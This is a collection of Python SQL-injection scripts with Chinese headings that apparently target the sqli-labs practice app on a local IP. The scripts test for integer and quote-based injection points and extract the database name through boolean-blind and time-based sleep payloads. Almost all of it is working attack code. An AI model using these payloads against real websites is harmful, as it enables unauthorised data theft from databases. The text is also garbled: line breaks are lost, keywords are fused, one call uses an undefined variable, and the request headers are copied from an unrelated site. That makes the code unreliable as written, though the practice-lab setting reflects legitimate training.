#### 判断是否为整形注入import requests
import re
header={"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8""Accept-Encoding":"gzip, deflate, br""Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2""Connection":"keep-alive""Cookie":"Hm_lvt_dd4738b5fb302cb062ef19107df5d2e4=1635672302,1635903472,1636200072,1637395585""Host":"newtab.firefoxchina.cn""Sec-Fetch-Dest":"document""Sec-Fetch-Mode":"navigate""Sec-Fetch-Site":"cross-site""Upgrade-Insecure-Requests":"1""User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"}
url1="输入当前URL?id=1 and 1=1"
url2="输入当前URL?id=1 and 1=2"
response1=requests.get(url1,headers=header)
response2=requests.get(url2,headers=header)if response1.text!=response2.text:print("该漏洞为整形sql漏洞")
#### 判断是否为字符注入import requests
import re
header={"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8""Accept-Encoding":"gzip, deflate, br""Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2""Connection":"keep-alive""Cookie":"Hm_lvt_dd4738b5fb302cb062ef19107df5d2e4=1635672302,1635903472,1636200072,1637395585""Host":"newtab.firefoxchina.cn""Sec-Fetch-Dest":"document""Sec-Fetch-Mode":"navigate""Sec-Fetch-Site":"cross-site""Upgrade-Insecure-Requests":"1""User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"}defis_quotes_inj(url):
quotes=["'",'"',")","')",'")']for quote in quotes:
true_url=url+quote+"%20and 1=1"+"--+"
fasle_url=url+quote+"%20and 1=2"+"--+"
url_responese=requests.get(url,headers=header)
true_url_response = requests.get(true_url,headers=header)
fasle_url_response = requests.get(fasle_url,headers=header)if true_url_response.text!=fasle_url_response.text and fasle_url_response.text!=url_responese.text and url_responese.text==true_url_response.text :print("this is a {} type of sql injection!".format(quote))
t=Trueelse:print(true_url)if t:returnTrueelse:returnFalse
url="http://192.168.66.128/sqli-labs-master/Less-10/?id=1"
is_quotes_inj(url)
#### 盲注获取数据import requests
import re
header={"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8""Accept-Encoding":"gzip, deflate, br""Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2""Connection":"keep-alive""Cookie":"Hm_lvt_dd4738b5fb302cb062ef19107df5d2e4=1635672302,1635903472,1636200072,1637395585""Host":"newtab.firefoxchina.cn""Sec-Fetch-Dest":"document""Sec-Fetch-Mode":"navigate""Sec-Fetch-Site":"cross-site""Upgrade-Insecure-Requests":"1""User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"}
chars="abcdefghijklmnopqrstuvwzxyABCDEFGHIJKLMNOPQRSTUVWZYZ0123456789~!@#$%^&*()_+<>?"
url="http://192.168.66.128/sqli-labs-master/Less-8/?id=1"
length_payload="' and length(database())={}--+"
data_payload="' and ascii(substr(database(),{},1))={}--+"defget_length(url,length_payload):for x inrange(1,50):
ex_url=url+length_payload.format(x)print(ex_url)
response = requests.get(ex_url,headers=header)if"You are in"in response.text :print("长度是"+str(x))return x
length=get_length(url,payload)defget_data(url,data_payload,length):
data=""for x inrange(1,length+1):for char in chars:
ex_url=url+data_payload.format(x,ord(char))
response = requests.get(ex_url,headers=header)if"You are in"in response.text :
data += char
print("数据是"+data)return data
name=get_data(url,data_payload,length)print(name)
#### 延时注入获取数据import requests
import time
header={"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8""Accept-Encoding":"gzip, deflate, br""Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2""Connection":"keep-alive""Cookie":"Hm_lvt_dd4738b5fb302cb062ef19107df5d2e4=1635672302,1635903472,1636200072,1637395585""Host":"newtab.firefoxchina.cn""Sec-Fetch-Dest":"document""Sec-Fetch-Mode":"navigate""Sec-Fetch-Site":"cross-site""Upgrade-Insecure-Requests":"1""User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"}
chars="abcdefghijklmnopqrstuvwzxyABCDEFGHIJKLMNOPQRSTUVWZYZ0123456789~!@#$%^&*()_+<>?"
url="http://192.168.66.128/sqli-labs-master/Less-8/?id=1"
length_payload="' and if(length(database())={},sleep(3),0)--+"
data_payload="' and if(ascii(substr(database(),{},1))={},sleep(3),0)--+"defget_length(url,length_payload):for x inrange(1,50):
ex_url=url+length_payload.format(x)
start=time.time()
response = requests.get(ex_url,headers=header)
end=time.time()print(end-start)if(end-start)>2:print("长度是"+str(x))return x
length=get_length(url,length_payload)defget_data(url,data_payload,length):
data=""for x inrange(1,length+1):for char in chars:
ex_url=url+data_payload.format(x,ord(char))
start=time.time()
response = requests.get(ex_url,headers=header)
end=time.time()if(end-start)>2:
data += char
print("数据是"+data)return data
name=get_data(url,data_payload,length)print(name)